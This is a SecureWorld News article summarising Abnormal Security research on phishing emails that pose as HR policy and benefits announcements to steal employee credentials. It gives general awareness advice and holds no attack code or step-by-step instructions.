SecureWorld News

Cybercriminals Exploiting HR Policy Announcements in Phishing Attacks

Written by Drew Todd | Fri | Jan 20, 2023 | 9:47 PM Z

As the new year begins, companies and their employees should be aware of a new type of phishing attack that is targeting the human resources department.

Cybercriminals are posing as HR officials and sending phishing emails that contain themes related to updated HR policy announcements. These emails typically include links or attachments that are used to steal employee credentials.

Abnormal Security, a cybersecurity solutions provider, has published research on these phishing attacks, highlighting two specific types: payload-based credential phishing attacks and link-based credential phishing attacks.

In payload-based credential phishing attacks, employees receive an email that appears to be from the HR department announcing a new employee benefits package. The email includes an attachment containing a phishing page that mimics a Microsoft login page. The login prompt requests the employee's password, claiming it is necessary to verify their identity in order to access the sensitive information in the attachment.

In link-based credential phishing attacks, the initial email poses as an internal announcement from the HR department highlighting a recent update to the corporate employee handbook. The email includes a link that takes the employee to a phishing page that mimics the company's login page and requests their credentials.

Both of these types of attacks are designed to trick employees into providing their login credentials by disguising the phishing attempts as legitimate internal company announcements.

To protect against these types of attacks, it is important to be vigilant when receiving emails from internal departments and to never click on links or open attachments from unknown or suspicious sources. Additionally, companies should invest in employee security awareness training and invest in security solutions that can detect and block such phishing attempts.

It's also important to note that these types of phishing attempts can bypass traditional security tools that rely on known bad indicators, as the files associated with these attacks may contain obfuscated source code and may not have been previously detected as malicious.

See the original report from Crane Hassold, Abnormal Security's Director of Threat Intelligence, for more information.

And don't forget to sign up for SecureWorld's upcoming Remote Sessions webcast, 5 Email Attacks to Watch For: How Threat Actors Are Targeting You, during which Hassold will provide an overview of email attacks recently seen by his team and give insight into what cybersecurity professionals can do to stop them.